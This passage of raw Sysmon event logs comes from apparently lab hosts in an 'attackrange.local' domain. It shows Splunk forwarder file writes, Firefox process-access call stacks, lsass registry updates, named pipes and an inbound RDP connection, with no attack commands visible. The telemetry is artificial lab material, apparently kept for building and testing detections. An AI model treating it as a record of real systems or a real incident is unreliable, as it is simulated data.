Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A4CB211BA5F5F90E6427439939464D6A,SHA256=F2CEEF0340E5717F742F8513E9B7D77DD0E6A56CCE22D52CBA907BE3DDDE0EB4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052336Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:58.210{466BC892-5A42-60E8-C510-00000000CF01}7816ATTACKRANGE\bobC:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exeC:\Users\bob\AppData\Local\Microsoft_Corporation\powershell_ise.exe_StrongName_lw2v2vm3wmtzzpebq33gybmeoxukb04w\3.0.0.0\AutoSaveInformation\7816.xml~RFf7144ed.TMPMD5=4553D3891EC8198EC956E59A7FA89664,SHA256=7DA31B28073EC76DCCA7EDFC3709014058FE36DCB6626D30538493EE344D57A6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052339Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:59.840{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=98D11ACCF485E88CF2749C78F0FDA321,SHA256=E8FE0C6DB59D5248C1C674A62072A4216E492DA9F1840C122DE219BEBA0BAB4B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809135Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:59.885{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F247C840B611CD29C60C457F799FD5AF,SHA256=7E1629D0E71C1042021D1979373F8C97F926ED08BDC70411D69CB669C7925685,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052347Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:00.855{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5A6FB4EACF71BCCBDE83319E9F625A93,SHA256=AABDB798B87597BAFD62D176BA953A3B0BCC250A481151AEE8C6258A4B09340F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809136Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:00.885{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E89709D62DDBA9663F4EA3C0ECC17344,SHA256=25173068B9333E5999787F018F32D12EA1224FFAD4AE98AA06F853ABD8F539BC,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001052346Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:00.692{466BC892-3462-60E8-100C-00000000CF01}89449164C:\Program Files\Mozilla Firefox\firefox.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+1549f7|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000001052345Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:00.692{466BC892-3462-60E8-100C-00000000CF01}89449164C:\Program Files\Mozilla Firefox\firefox.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+154962|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000001052344Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:00.692{466BC892-3462-60E8-100C-00000000CF01}89449164C:\Program Files\Mozilla Firefox\firefox.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+154947|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f 10341000x80000000000000001052343Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:00.692{466BC892-3462-60E8-100C-00000000CF01}89449164C:\Program Files\Mozilla Firefox\firefox.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+154947|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336 23542300x80000000000000001052342Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:00.692{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6824f4a902c78fbd.customDestinations-ms~RFf714e91.TMPMD5=FEEDDF0B48ACBAE2DF2C13E094BA61E1,SHA256=564E4AC53FEF38F8EC2ADC3773CA3AE2E546D9CF626CDED40CA8B8DCCA4D789B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052341Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:00.656{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\aborted-session-pingMD5=04172E096871FA5DEFBDF54D4BF7D7E5,SHA256=E3D8F9F68C4CF1D7EB746F47EE1D426B8D979B596EE1E53C91E5DC7A41AFED4E,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001052340Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:51.729{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51153-false10.0.1.12-8000- 23542300x80000000000000001052348Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:01.891{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=24D64D2D9AB441C19FD47F45469A89C7,SHA256=925A20C779AE465D2FC6924DE1D0AF9097677D39A16C01C074F949F4810E75F1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809137Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:01.916{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=809BA0A385C7259FDD298310D824EF51,SHA256=770B0EE6497BC52B82BC5A0F0BC29023EDE2FE4A778A04A6C906A456A0D32170,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809139Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:02.932{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1213CEACB11F616ED71C376DACDA80A4,SHA256=171F797D23A6EC736B2652DDD056E28E0EFEBD47A7D229F3C66CB1F9398F3396,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052349Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:02.906{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ECAAD83484F076E225AC07C8D1A1321D,SHA256=18E65A9225FDE33C480B8B06996D67703B0EE3E522C8951A185E89F930CD256E,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000809138Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:01.377{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57377-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001052352Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:03.921{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4C9DE4C2D85E16DC949217E98D728766,SHA256=E2B8E86E49D776C23807ED7EC1C21A54604BC706E10B57DA3B16E2927B66ECE0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809140Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:03.979{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5B084634EA849894C839DC2BD4E9B749,SHA256=8C61786D43B7190A00B9DD3B1ABB8DD4934C8CBA9202CC941F685735F440B99A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052351Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:03.452{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0E333DAA00100B95C076F824523ED600,SHA256=C97290A86891589016B33ACC28D644E4583A18DF70FDC6D4D6B973E541FE0A61,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052350Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:03.452{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=707136D61E4EC9CD3986F58852C33E33,SHA256=35213A5C94DAFB7407552BD317452A67EB42B6E7BB156EF3F9B9E03B69ACBBF8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052354Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:04.935{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8E764D682B1ABCE556F80242A65F2CAA,SHA256=41702A39C825852B89BC34EAA0A5DD892C2C3F9510EA99E0096916AD656C69E1,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001052353Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:55.680{466BC892-02AF-60E8-0F00-00000000CF01}360C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse195.78.54.188-59512-false10.0.1.14win-dc-890.attackrange.local3389ms-wbt-server 13241300x8000000000000000809150Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-SetValue2021-07-12 08:01:04.526{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000008) 13241300x8000000000000000809149Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-SetValue2021-07-12 08:01:04.526{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x0f6a1ca6) 13241300x8000000000000000809148Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-SetValue2021-07-12 08:01:04.526{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d776eb-0xadf671d5) 13241300x8000000000000000809147Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-SetValue2021-07-12 08:01:04.526{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d776f4-0x0fbad9d5) 13241300x8000000000000000809146Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-SetValue2021-07-12 08:01:04.526{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d776fc-0x717f41d5) 13241300x8000000000000000809145Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-SetValue2021-07-12 08:01:04.526{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000008) 13241300x8000000000000000809144Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-SetValue2021-07-12 08:01:04.526{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x0f6a1ca6) 13241300x8000000000000000809143Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-SetValue2021-07-12 08:01:04.526{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d776eb-0xadf671d5) 13241300x8000000000000000809142Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-SetValue2021-07-12 08:01:04.526{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d776f4-0x0fbad9d5) 13241300x8000000000000000809141Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-SetValue2021-07-12 08:01:04.526{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d776fc-0x717f41d5) 23542300x80000000000000001052355Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:05.950{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=915F549529C200F624A6C835D888749B,SHA256=BA4B1919B8B155520847BC0ECE6188A3AFA2223BE98F92F1E82D86FF7C8D7A62,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809151Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:04.995{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3DDBB44461D0DE2432A912BD73B4913A,SHA256=12471AD9F1EE1C77DB3F9EA192E2A2825BC328A5C84A9DA8305562C6BC8CE91A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052362Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:06.952{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2BD361E447914B070AE6C94C44AE4957,SHA256=A42BA5190C1A194D04C39BAE1095A778635D946D40BA528CFF8D155963B782F4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809152Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:06.010{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F58CADFEE4A27095063EDE964DDB845D,SHA256=384A1A4339E58AE80F191D64FCE88EBFCDE3EC985886AB35997735D537DDCB62,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052361Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:06.375{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\storage\default\https+++twitter.com\idb\1046228012scyn.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001052360Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:06.319{466BC892-3462-60E8-100C-00000000CF01}89445812C:\Program Files\Mozilla Firefox\firefox.exe{466BC892-5563-60E8-2010-00000000CF01}4048C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3e7611|C:\Program Files\Mozilla Firefox\xul.dll+121488e|C:\Program Files\Mozilla Firefox\xul.dll+140c86d|C:\Program Files\Mozilla Firefox\xul.dll+1223271|C:\Program Files\Mozilla Firefox\xul.dll+12192da|C:\Program Files\Mozilla Firefox\xul.dll+2208260|C:\Program Files\Mozilla Firefox\xul.dll+221acda|C:\Program Files\Mozilla Firefox\xul.dll+2201919|C:\Program Files\Mozilla Firefox\xul.dll+2201645|C:\Program Files\Mozilla Firefox\xul.dll+2205190|C:\Program Files\Mozilla Firefox\xul.dll+2216ecd|C:\Program Files\Mozilla Firefox\xul.dll+22213c8|C:\Program Files\Mozilla Firefox\xul.dll+2220a14|C:\Program Files\Mozilla Firefox\xul.dll+220bbd6|C:\Program Files\Mozilla Firefox\xul.dll+40976|C:\Program Files\Mozilla Firefox\xul.dll+3f85a|C:\Program Files\Mozilla Firefox\xul.dll+120351f|C:\Program Files\Mozilla Firefox\xul.dll+3f65e|C:\Program Files\Mozilla Firefox\xul.dll+dabd27|C:\Program Files\Mozilla Firefox\nss3.dll+fac5a|C:\Program Files\Mozilla Firefox\nss3.dll+ee441|C:\Windows\System32\ucrtbase.dll+1fb80 10341000x80000000000000001052359Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:06.319{466BC892-3462-60E8-100C-00000000CF01}89445812C:\Program Files\Mozilla Firefox\firefox.exe{466BC892-5563-60E8-2010-00000000CF01}4048C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3e7611|C:\Program Files\Mozilla Firefox\xul.dll+121488e|C:\Program Files\Mozilla Firefox\xul.dll+140c86d|C:\Program Files\Mozilla Firefox\xul.dll+1223271|C:\Program Files\Mozilla Firefox\xul.dll+12192da|C:\Program Files\Mozilla Firefox\xul.dll+2208260|C:\Program Files\Mozilla Firefox\xul.dll+221acda|C:\Program Files\Mozilla Firefox\xul.dll+2201919|C:\Program Files\Mozilla Firefox\xul.dll+2201645|C:\Program Files\Mozilla Firefox\xul.dll+2205190|C:\Program Files\Mozilla Firefox\xul.dll+2216ecd|C:\Program Files\Mozilla Firefox\xul.dll+22213c8|C:\Program Files\Mozilla Firefox\xul.dll+2220a14|C:\Program Files\Mozilla Firefox\xul.dll+220bbd6|C:\Program Files\Mozilla Firefox\xul.dll+40976|C:\Program Files\Mozilla Firefox\xul.dll+3f85a|C:\Program Files\Mozilla Firefox\xul.dll+120351f|C:\Program Files\Mozilla Firefox\xul.dll+3f65e|C:\Program Files\Mozilla Firefox\xul.dll+dabd27|C:\Program Files\Mozilla Firefox\nss3.dll+fac5a|C:\Program Files\Mozilla Firefox\nss3.dll+ee441|C:\Windows\System32\ucrtbase.dll+1fb80 18141800x80000000000000001052358Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-ConnectPipe2021-07-12 08:01:06.319{466BC892-3462-60E8-100C-00000000CF01}8944\chrome.4048.411.27391487C:\Program Files\Mozilla Firefox\firefox.exe 17141700x80000000000000001052357Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-CreatePipe2021-07-12 08:01:06.319{466BC892-5563-60E8-2010-00000000CF01}4048\chrome.4048.411.27391487C:\Program Files\Mozilla Firefox\firefox.exe 354300x80000000000000001052356Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:57.623{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51154-false10.0.1.12-8000- 23542300x80000000000000001052364Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:07.970{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=734ECE7A8D5005F4DB19EF289CDE4C92,SHA256=1860BF5EEEBE6603861EA4774D13BAE8216EC43A6AB15ECC30C72F38B96EAE03,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809153Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:07.010{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EFFDE13CDAA218F31CDDD62BB104571C,SHA256=AB4DEEACB5C64C21882DB74D3003D107ED018473BFB21DF72FFE8F36DCF48FE6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052363Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:07.189{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0E333DAA00100B95C076F824523ED600,SHA256=C97290A86891589016B33ACC28D644E4583A18DF70FDC6D4D6B973E541FE0A61,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052366Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:08.989{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=702DFD7BAD073B47DA38E8D5C4287489,SHA256=9FF9B106DE9ACB94E7454D9EC8AF82DF8515C0ACBC1EE887802AC64BF1C71497,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000809155Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:06.393{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program 